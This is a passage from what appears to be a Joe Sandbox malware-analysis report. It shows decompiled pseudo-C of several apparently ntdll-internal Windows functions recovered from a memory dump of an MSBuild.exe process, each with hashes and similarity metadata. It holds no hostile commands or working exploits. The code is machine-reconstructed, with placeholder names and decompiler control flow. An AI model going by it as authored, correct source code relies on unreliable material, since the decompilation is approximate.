                                            																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                            																						_t91 =  *(_t177 + 0x20);
                                            																						goto L26;
                                            																					}
                                            																				}
                                            																				goto L35;
                                            																			} else {
                                            																				L26:
                                            																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                            																				__eflags = _t94;
                                            																				L27:
                                            																				 *(_t177 + 0x20) = _t94;
                                            																				__eflags = _t170 & 0x00008000;
                                            																				if((_t170 & 0x00008000) != 0) {
                                            																					_t95 = _a12;
                                            																					__eflags = _t95;
                                            																					if(_t95 != 0) {
                                            																						_t96 =  *_t95;
                                            																						__eflags = _t96;
                                            																						if(_t96 != 0) {
                                            																							 *((short*)(_t177 + 0x22)) = 0;
                                            																							_t40 = _t177 + 0x20;
                                            																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                            																							__eflags =  *_t40;
                                            																						}
                                            																					}
                                            																				}
                                            																				goto L31;
                                            																			}
                                            																		}
                                            																	}
                                            																}
                                            															}
                                            														}
                                            													} else {
                                            														_t147 =  *( *[fs:0x18] + 0xfc0);
                                            														_t106 =  *(_t147 + 0x20);
                                            														__eflags = _t106 & 0x00000040;
                                            														if((_t106 & 0x00000040) != 0) {
                                            															_t147 = E0103FD22(_t147);
                                            															__eflags = _t147;
                                            															if(_t147 == 0) {
                                            																L41:
                                            																_t130 = 0xc0000001;
                                            																L32:
                                            																_t77 = _t130;
                                            																goto L33;
                                            															} else {
                                            																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                            																_t106 =  *(_t147 + 0x20);
                                            																goto L17;
                                            															}
                                            															goto L35;
                                            														} else {
                                            															L17:
                                            															_t108 = _t106 | 0x00000080;
                                            															__eflags = _t108;
                                            															 *(_t147 + 0x20) = _t108;
                                            															 *( *[fs:0x18] + 0xfc0) = _t147;
                                            															goto L18;
                                            														}
                                            													}
                                            												}
                                            											}
                                            											L33:
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            						L35:
                                            						return _t77;
                                            					} else {
                                            						 *_t75 = 0x10f7b80;
                                            						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                            						 *_t134 = _t75;
                                            						 *0x10f7b84 = _t75;
                                            						_t73 = E0101EB70(_t134, 0x10f7b60);
                                            						if( *0x10f7b20 != 0) {
                                            							_t73 =  *( *[fs:0x30] + 0xc);
                                            							if( *((char*)(_t73 + 0x28)) == 0) {
                                            								_t73 = E0101FF60( *0x10f7b20);
                                            							}
                                            						}
                                            						goto L5;
                                            					}
                                            				}
                                            			}


















































                                            Strings
                                            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0107BE0F
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                            • API String ID: 0-865735534
                                            • Opcode ID: a139ef4471944b6cd4c460314bc0bc53a722084fa1ccb4665f6d596269239023
                                            • Instruction ID: e9b08a8783724422d37cc0f367e4a2b945f84c808cb6aff495787aaa6ebc5032
                                            • Opcode Fuzzy Hash: a139ef4471944b6cd4c460314bc0bc53a722084fa1ccb4665f6d596269239023
                                            • Instruction Fuzzy Hash: 1CA1F471F0060B8FEB65DB68C454BBAB7E9AF84710F0445A9E9C6DB781DB34D801CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 63%
                                            			E01002D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                            				signed char _v8;
                                            				signed int _v12;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				signed int _v24;
                                            				intOrPtr _v28;
                                            				intOrPtr _v32;
                                            				signed int _v52;
                                            				void* __esi;
                                            				void* __ebp;
                                            				intOrPtr _t55;
                                            				signed int _t57;
                                            				signed int _t58;
                                            				char* _t62;
                                            				signed char* _t63;
                                            				signed char* _t64;
                                            				signed int _t67;
                                            				signed int _t72;
                                            				signed int _t77;
                                            				signed int _t78;
                                            				signed int _t88;
                                            				intOrPtr _t89;
                                            				signed char _t93;
                                            				signed int _t97;
                                            				signed int _t98;
                                            				signed int _t102;
                                            				signed int _t103;
                                            				intOrPtr _t104;
                                            				signed int _t105;
                                            				signed int _t106;
                                            				signed char _t109;
                                            				signed int _t111;
                                            				void* _t116;
                                            
                                            				_t102 = __edi;
                                            				_t97 = __edx;
                                            				_v12 = _v12 & 0x00000000;
                                            				_t55 =  *[fs:0x18];
                                            				_t109 = __ecx;
                                            				_v8 = __edx;
                                            				_t86 = 0;
                                            				_v32 = _t55;
                                            				_v24 = 0;
                                            				_push(__edi);
                                            				if(__ecx == 0x10f5350) {
                                            					_t86 = 1;
                                            					_v24 = 1;
                                            					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                            				}
                                            				_t103 = _t102 | 0xffffffff;
                                            				if( *0x10f7bc8 != 0) {
                                            					_push(0xc000004b);
                                            					_push(_t103);
                                            					E010497C0();
                                            				}
                                            				if( *0x10f79c4 != 0) {
                                            					_t57 = 0;
                                            				} else {
                                            					_t57 = 0x10f79c8;
                                            				}
                                            				_v16 = _t57;
                                            				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                            					_t93 = _t109;
                                            					L23();
                                            				}
                                            				_t58 =  *_t109;
                                            				if(_t58 == _t103) {
                                            					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                            					_t58 = _t103;
                                            					if(__eflags == 0) {
                                            						_t93 = _t109;
                                            						E01031624(_t86, __eflags);
                                            						_t58 =  *_t109;
                                            					}
                                            				}
                                            				_v20 = _v20 & 0x00000000;
                                            				if(_t58 != _t103) {
                                            					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                            				}
                                            				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                            				_t88 = _v16;
                                            				_v28 = _t104;
                                            				L9:
                                            				while(1) {
                                            					if(E01027D50() != 0) {
                                            						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                            					} else {
                                            						_t62 = 0x7ffe0382;
                                            					}
                                            					if( *_t62 != 0) {
                                            						_t63 =  *[fs:0x30];
                                            						__eflags = _t63[0x240] & 0x00000002;
                                            						if((_t63[0x240] & 0x00000002) != 0) {
                                            							_t93 = _t109;
                                            							E0109FE87(_t93);
                                            						}
                                            					}
                                            					if(_t104 != 0xffffffff) {
                                            						_push(_t88);
                                            						_push(0);
                                            						_push(_t104);
                                            						_t64 = E01049520();
                                            						goto L15;
                                            					} else {
                                            						while(1) {
                                            							_t97 =  &_v8;
                                            							_t64 = E0103E18B(_t109 + 4, _t97, 4, _t88, 0);
                                            							if(_t64 == 0x102) {
                                            								break;
                                            							}
                                            							_t93 =  *(_t109 + 4);
                                            							_v8 = _t93;
                                            							if((_t93 & 0x00000002) != 0) {
                                            								continue;
                                            							}
                                            							L15:
                                            							if(_t64 == 0x102) {
                                            								break;
                                            							}
                                            							_t89 = _v24;
                                            							if(_t64 < 0) {
                                            								L0105DF30(_t93, _t97, _t64);
                                            								_push(_t93);
                                            								_t98 = _t97 | 0xffffffff;
                                            								__eflags =  *0x10f6901;
                                            								_push(_t109);
                                            								_v52 = _t98;
                                            								if( *0x10f6901 != 0) {
                                            									_push(0);
                                            									_push(1);
                                            									_push(0);
                                            									_push(0x100003);
                                            									_push( &_v12);
                                            									_t72 = E01049980();
                                            									__eflags = _t72;
                                            									if(_t72 < 0) {
                                            										_v12 = _t98 | 0xffffffff;
                                            									}
                                            								}
                                            								asm("lock cmpxchg [ecx], edx");
                                            								_t111 = 0;
                                            								__eflags = 0;
                                            								if(0 != 0) {
                                            									__eflags = _v12 - 0xffffffff;
                                            									if(_v12 != 0xffffffff) {
                                            										_push(_v12);
                                            										E010495D0();
                                            									}
                                            								} else {
                                            									_t111 = _v12;
                                            								}
                                            								return _t111;
                                            							} else {
                                            								if(_t89 != 0) {
                                            									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                            									_t77 = E01027D50();
                                            									__eflags = _t77;
                                            									if(_t77 == 0) {
                                            										_t64 = 0x7ffe0384;
                                            									} else {
                                            										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                            									}
                                            									__eflags =  *_t64;
                                            									if( *_t64 != 0) {
                                            										_t64 =  *[fs:0x30];
                                            										__eflags = _t64[0x240] & 0x00000004;
                                            										if((_t64[0x240] & 0x00000004) != 0) {
                                            											_t78 = E01027D50();
                                            											__eflags = _t78;
                                            											if(_t78 == 0) {
                                            												_t64 = 0x7ffe0385;
                                            											} else {
                                            												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                            											}
                                            											__eflags =  *_t64 & 0x00000020;
                                            											if(( *_t64 & 0x00000020) != 0) {
                                            												_t64 = E01087016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                            											}
                                            										}
                                            									}
                                            								}
                                            								return _t64;
                                            							}
                                            						}
                                            						_t97 = _t88;
                                            						_t93 = _t109;
                                            						E0109FDDA(_t97, _v12);
                                            						_t105 =  *_t109;
                                            						_t67 = _v12 + 1;
                                            						_v12 = _t67;
                                            						__eflags = _t105 - 0xffffffff;
                                            						if(_t105 == 0xffffffff) {
                                            							_t106 = 0;
                                            							__eflags = 0;
                                            						} else {
                                            							_t106 =  *(_t105 + 0x14);
                                            						}
                                            						__eflags = _t67 - 2;
                                            						if(_t67 > 2) {
                                            							__eflags = _t109 - 0x10f5350;
                                            							if(_t109 != 0x10f5350) {
                                            								__eflags = _t106 - _v20;
                                            								if(__eflags == 0) {
                                            									_t93 = _t109;
                                            									E0109FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                            								}
                                            							}
                                            						}
                                            						_push("RTL: Re-Waiting\n");
                                            						_push(0);
                                            						_push(0x65);
                                            						_v20 = _t106;
                                            						E01095720();
                                            						_t104 = _v28;
                                            						_t116 = _t116 + 0xc;
                                            						continue;
                                            					}
                                            				}
                                            			}


                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Re-Waiting
                                            • API String ID: 0-316354757
                                            • Opcode ID: 61c11fb9a3856ba587bf4b441b826b744fb2475b2dde1b37709519750872761b
                                            • Instruction ID: 946c9b15266a19513d454131275b1eb5fc36ef0315ea82b863b21788a135751d
                                            • Opcode Fuzzy Hash: 61c11fb9a3856ba587bf4b441b826b744fb2475b2dde1b37709519750872761b
                                            • Instruction Fuzzy Hash: DD612471A006469BEB63DB6CC848BBF7BE5EB44714F1406AAE9D1972C1C7389D40C782
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 80%
                                            			E010D0EA5(void* __ecx, void* __edx) {
                                            				signed int _v20;
                                            				char _v24;
                                            				intOrPtr _v28;
                                            				unsigned int _v32;
                                            				signed int _v36;
                                            				intOrPtr _v40;
                                            				char _v44;
                                            				intOrPtr _v64;
                                            				void* __ebx;
                                            				void* __edi;
                                            				signed int _t58;
                                            				unsigned int _t60;
                                            				intOrPtr _t62;
                                            				char* _t67;
                                            				char* _t69;
                                            				void* _t80;
                                            				void* _t83;
                                            				intOrPtr _t93;
                                            				intOrPtr _t115;
                                            				char _t117;
                                            				void* _t120;
                                            
                                            				_t83 = __edx;
                                            				_t117 = 0;
                                            				_t120 = __ecx;
                                            				_v44 = 0;
                                            				if(E010CFF69(__ecx,  &_v44,  &_v32) < 0) {
                                            					L24:
                                            					_t109 = _v44;
                                            					if(_v44 != 0) {
                                            						E010D1074(_t83, _t120, _t109, _t117, _t117);
                                            					}
                                            					L26:
                                            					return _t117;
                                            				}
                                            				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                            				_t5 = _t83 + 1; // 0x1
                                            				_v36 = _t5 << 0xc;
                                            				_v40 = _t93;
                                            				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                            				asm("sbb ebx, ebx");
                                            				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                            				if(_t58 != 0) {
                                            					_push(0);
                                            					_push(0x14);
                                            					_push( &_v24);
                                            					_push(3);
                                            					_push(_t93);
                                            					_push(0xffffffff);
                                            					_t80 = E01049730();
                                            					_t115 = _v64;
                                            					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                            						_push(_t93);
                                            						E010CA80D(_t115, 1, _v20, _t117);
                                            						_t83 = 4;
                                            					}
                                            				}
                                            				if(E010CA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                            					goto L24;
                                            				}
                                            				_t60 = _v32;
                                            				_t97 = (_t60 != 0x100000) + 1;
                                            				_t83 = (_v44 -  *0x10f8b04 >> 0x14) + (_v44 -  *0x10f8b04 >> 0x14);
                                            				_v28 = (_t60 != 0x100000) + 1;
                                            				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                            				_v40 = _t62;
                                            				if(_t83 >= _t62) {
                                            					L10:
                                            					asm("lock xadd [eax], ecx");
                                            					asm("lock xadd [eax], ecx");
                                            					if(E01027D50() == 0) {
                                            						_t67 = 0x7ffe0380;
                                            					} else {
                                            						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            					}
                                            					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                            						E010C138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                            					}
                                            					if(E01027D50() == 0) {
                                            						_t69 = 0x7ffe0388;
                                            					} else {
                                            						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                            					}
                                            					if( *_t69 != 0) {
                                            						E010BFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                            					}
                                            					if(( *0x10f8724 & 0x00000008) != 0) {
                                            						E010C52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                            					}
                                            					_t117 = _v44;
                                            					goto L26;
                                            				}
                                            				while(E010D15B5(0x10f8ae4, _t83, _t97, _t97) >= 0) {
                                            					_t97 = _v28;
                                            					_t83 = _t83 + 2;
                                            					if(_t83 < _v40) {
                                            						continue;
                                            					}
                                            					goto L10;
                                            				}
                                            				goto L24;
                                            			}


                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: `
                                            • API String ID: 0-2679148245
                                            • Opcode ID: 996fca6935ff05755ca32902303c69886c98858367b8fbca9d62c460d3ce2980
                                            • Instruction ID: 48756e307853bc24b7d28fb02e15d2c251bf0a8d1dfea2c7921722f454fff46f
                                            • Opcode Fuzzy Hash: 996fca6935ff05755ca32902303c69886c98858367b8fbca9d62c460d3ce2980
                                            • Instruction Fuzzy Hash: F851AC713083429FE324EF28D884B5BBBE5EBC4704F14096DFAD687690DA71E805CB62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 75%
                                            			E0103F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				char* _v20;
                                            				intOrPtr _v24;
                                            				char _v28;
                                            				intOrPtr _v32;
                                            				char _v36;
                                            				char _v44;
                                            				char _v52;
                                            				intOrPtr _v56;
                                            				char _v60;
                                            				intOrPtr _v72;
                                            				void* _t51;
                                            				void* _t58;
                                            				signed short _t82;
                                            				short _t84;
                                            				signed int _t91;
                                            				signed int _t100;
                                            				signed short* _t103;
                                            				void* _t108;
                                            				intOrPtr* _t109;
                                            
                                            				_t103 = __ecx;
                                            				_t82 = __edx;
                                            				_t51 = E01024120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                            				if(_t51 >= 0) {
                                            					_push(0x21);
                                            					_push(3);
                                            					_v56 =  *0x7ffe02dc;
                                            					_v20 =  &_v52;
                                            					_push( &_v44);
                                            					_v28 = 0x18;
                                            					_push( &_v28);
                                            					_push(0x100020);
                                            					_v24 = 0;
                                            					_push( &_v60);
                                            					_v16 = 0x40;
                                            					_v12 = 0;
                                            					_v8 = 0;
                                            					_t58 = E01049830();
                                            					_t87 =  *[fs:0x30];
                                            					_t108 = _t58;
                                            					L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                            					if(_t108 < 0) {
                                            						L11:
                                            						_t51 = _t108;
                                            					} else {
                                            						_push(4);
                                            						_push(8);
                                            						_push( &_v36);
                                            						_push( &_v44);
                                            						_push(_v60);
                                            						_t108 = E01049990();
                                            						if(_t108 < 0) {
                                            							L10:
                                            							_push(_v60);
                                            							E010495D0();
                                            							goto L11;
                                            						} else {
                                            							_t109 = L01024620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                            							if(_t109 == 0) {
                                            								_t108 = 0xc0000017;
                                            								goto L10;
                                            							} else {
                                            								_t21 = _t109 + 0x18; // 0x18
                                            								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                            								 *_t109 = 1;
                                            								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                            								 *(_t109 + 0xe) = _t82;
                                            								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                            								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                            								E0104F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                            								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                            								 *((short*)(_t109 + 0xc)) =  *_t103;
                                            								_t91 =  *_t103 & 0x0000ffff;
                                            								_t100 = _t91 & 0xfffffffe;
                                            								_t84 = 0x5c;
                                            								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                            									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                            										_push(_v60);
                                            										E010495D0();
                                            										L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                            										_t51 = 0xc0000106;
                                            									} else {
                                            										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                            										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                            										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                            										goto L5;
                                            									}
                                            								} else {
                                            									L5:
                                            									 *_a4 = _t109;
                                            									_t51 = 0;
                                            								}
                                            							}
                                            						}
                                            					}
                                            				}
                                            				return _t51;
                                            			}

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                            • Instruction ID: 41b9cfa4054c30777bd4a48e2a6169fcee94a82ccea38c224ce80caa52c674ff
                                            • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                            • Instruction Fuzzy Hash: DD517FB1504711AFD321DF19C840A6BBBF8FF98710F108A2DFA9597690E7B4E914CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 75%
                                            			E01083540(intOrPtr _a4) {
                                            				signed int _v12;
                                            				intOrPtr _v88;
                                            				intOrPtr _v92;
                                            				char _v96;
                                            				char _v352;
                                            				char _v1072;
                                            				intOrPtr _v1140;
                                            				intOrPtr _v1148;
                                            				char _v1152;
                                            				char _v1156;
                                            				char _v1160;
                                            				char _v1164;
                                            				char _v1168;
                                            				char* _v1172;
                                            				short _v1174;
                                            				char _v1176;
                                            				char _v1180;
                                            				char _v1192;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				short _t41;
                                            				short _t42;
                                            				intOrPtr _t80;
                                            				intOrPtr _t81;
                                            				signed int _t82;
                                            				void* _t83;
                                            
                                            				_v12 =  *0x10fd360 ^ _t82;
                                            				_t41 = 0x14;
                                            				_v1176 = _t41;
                                            				_t42 = 0x16;
                                            				_v1174 = _t42;
                                            				_v1164 = 0x100;
                                            				_v1172 = L"BinaryHash";
                                            				_t81 = E01040BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                            				if(_t81 < 0) {
                                            					L11:
                                            					_t75 = _t81;
                                            					E01083706(0, _t81, _t79, _t80);
                                            					L12:
                                            					if(_a4 != 0xc000047f) {
                                            						E0104FA60( &_v1152, 0, 0x50);
                                            						_v1152 = 0x60c201e;
                                            						_v1148 = 1;
                                            						_v1140 = E01083540;
                                            						E0104FA60( &_v1072, 0, 0x2cc);
                                            						_push( &_v1072);
                                            						E0105DDD0( &_v1072, _t75, _t79, _t80, _t81);
                                            						E01090C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                            						_push(_v1152);
                                            						_push(0xffffffff);
                                            						E010497C0();
                                            					}
                                            					return E0104B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                            				}
                                            				_t79 =  &_v352;
                                            				_t81 = E01083971(0, _a4,  &_v352,  &_v1156);
                                            				if(_t81 < 0) {
                                            					goto L11;
                                            				}
                                            				_t75 = _v1156;
                                            				_t79 =  &_v1160;
                                            				_t81 = E01083884(_v1156,  &_v1160,  &_v1168);
                                            				if(_t81 >= 0) {
                                            					_t80 = _v1160;
                                            					E0104FA60( &_v96, 0, 0x50);
                                            					_t83 = _t83 + 0xc;
                                            					_push( &_v1180);
                                            					_push(0x50);
                                            					_push( &_v96);
                                            					_push(2);
                                            					_push( &_v1176);
                                            					_push(_v1156);
                                            					_t81 = E01049650();
                                            					if(_t81 >= 0) {
                                            						if(_v92 != 3 || _v88 == 0) {
                                            							_t81 = 0xc000090b;
                                            						}
                                            						if(_t81 >= 0) {
                                            							_t75 = _a4;
                                            							_t79 =  &_v352;
                                            							E01083787(_a4,  &_v352, _t80);
                                            						}
                                            					}
                                            					L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                            				}
                                            				_push(_v1156);
                                            				E010495D0();
                                            				if(_t81 >= 0) {
                                            					goto L12;
                                            				} else {
                                            					goto L11;
                                            				}
                                            			}

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: BinaryHash
                                            • API String ID: 0-2202222882
                                            • Opcode ID: 852ba2914041263d0982f89ec995ad973e792c5d4cb95bc8f0e85e720b3d9f09
                                            • Instruction ID: 109a6518b3a492f06c45d4a46365c0da58beb722bb2bd8a281a9ae3cf4e76e0c
                                            • Opcode Fuzzy Hash: 852ba2914041263d0982f89ec995ad973e792c5d4cb95bc8f0e85e720b3d9f09
                                            • Instruction Fuzzy Hash: E74166F1D0452D9BDB21EA54CC80FDEB77CAB54718F0085A5EA88AB240DB319E98CF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 71%
                                            			E010D05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                            				signed int _v20;
                                            				char _v24;
                                            				signed int _v28;
                                            				char _v32;
                                            				signed int _v36;
                                            				intOrPtr _v40;
                                            				void* __ebx;
                                            				void* _t35;
                                            				signed int _t42;
                                            				char* _t48;
                                            				signed int _t59;
                                            				signed char _t61;
                                            				signed int* _t79;
                                            				void* _t88;
                                            
                                            				_v28 = __edx;
                                            				_t79 = __ecx;
                                            				if(E010D07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                            					L13:
                                            					_t35 = 0;
                                            					L14:
                                            					return _t35;
                                            				}
                                            				_t61 = __ecx[1];
                                            				_t59 = __ecx[0xf];
                                            				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                            				_v36 = _a8 << 0xc;
                                            				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                            				asm("sbb esi, esi");
                                            				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                            				if(_t42 != 0) {
                                            					_push(0);
                                            					_push(0x14);
                                            					_push( &_v24);
                                            					_push(3);
                                            					_push(_t59);
                                            					_push(0xffffffff);
                                            					if(E01049730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                            						_push(_t61);
                                            						E010CA80D(_t59, 1, _v20, 0);
                                            						_t88 = 4;
                                            					}
                                            				}
                                            				_t35 = E010CA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                            				if(_t35 < 0) {
                                            					goto L14;
                                            				}
                                            				E010D1293(_t79, _v40, E010D07DF(_t79, _v28,  &_a4,  &_a8, 1));
                                            				if(E01027D50() == 0) {
                                            					_t48 = 0x7ffe0380;
                                            				} else {
                                            					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            				}
                                            				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                            					E010C138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                            				}
                                            				goto L13;
                                            			}

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: `
                                            • API String ID: 0-2679148245
                                            • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                            • Instruction ID: 6c15e77d57bce289b9d2866e7777224f52aaf834a41682401ccb16c1c0930eba
                                            • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                            • Instruction Fuzzy Hash: 5531D532704346ABE710DE19CD45F9B7BD9AB88754F144129FA98DB284E770E904CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 72%
                                            			E01083884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                            				char _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr* _v16;
                                            				char* _v20;
                                            				short _v22;
                                            				char _v24;
                                            				intOrPtr _t38;
                                            				short _t40;
                                            				short _t41;
                                            				void* _t44;
                                            				intOrPtr _t47;
                                            				void* _t48;
                                            
                                            				_v16 = __edx;
                                            				_t40 = 0x14;
                                            				_v24 = _t40;
                                            				_t41 = 0x16;
                                            				_v22 = _t41;
                                            				_t38 = 0;
                                            				_v12 = __ecx;
                                            				_push( &_v8);
                                            				_push(0);
                                            				_push(0);
                                            				_push(2);
                                            				_t43 =  &_v24;
                                            				_v20 = L"BinaryName";
                                            				_push( &_v24);
                                            				_push(__ecx);
                                            				_t47 = 0;
                                            				_t48 = E01049650();
                                            				if(_t48 >= 0) {
                                            					_t48 = 0xc000090b;
                                            				}
                                            				if(_t48 != 0xc0000023) {
                                            					_t44 = 0;
                                            					L13:
                                            					if(_t48 < 0) {
                                            						L16:
                                            						if(_t47 != 0) {
                                            							L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                            						}
                                            						L18:
                                            						return _t48;
                                            					}
                                            					 *_v16 = _t38;
                                            					 *_a4 = _t47;
                                            					goto L18;
                                            				}
                                            				_t47 = L01024620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                            				if(_t47 != 0) {
                                            					_push( &_v8);
                                            					_push(_v8);
                                            					_push(_t47);
                                            					_push(2);
                                            					_push( &_v24);
                                            					_push(_v12);
                                            					_t48 = E01049650();
                                            					if(_t48 < 0) {
                                            						_t44 = 0;
                                            						goto L16;
                                            					}
                                            					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                            						_t48 = 0xc000090b;
                                            					}
                                            					_t44 = 0;
                                            					if(_t48 < 0) {
                                            						goto L16;
                                            					} else {
                                            						_t17 = _t47 + 0xc; // 0xc
                                            						_t38 = _t17;
                                            						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                            							_t48 = 0xc000090b;
                                            						}
                                            						goto L13;
                                            					}
                                            				}
                                            				_t48 = _t48 + 0xfffffff4;
                                            				goto L18;
                                            			}










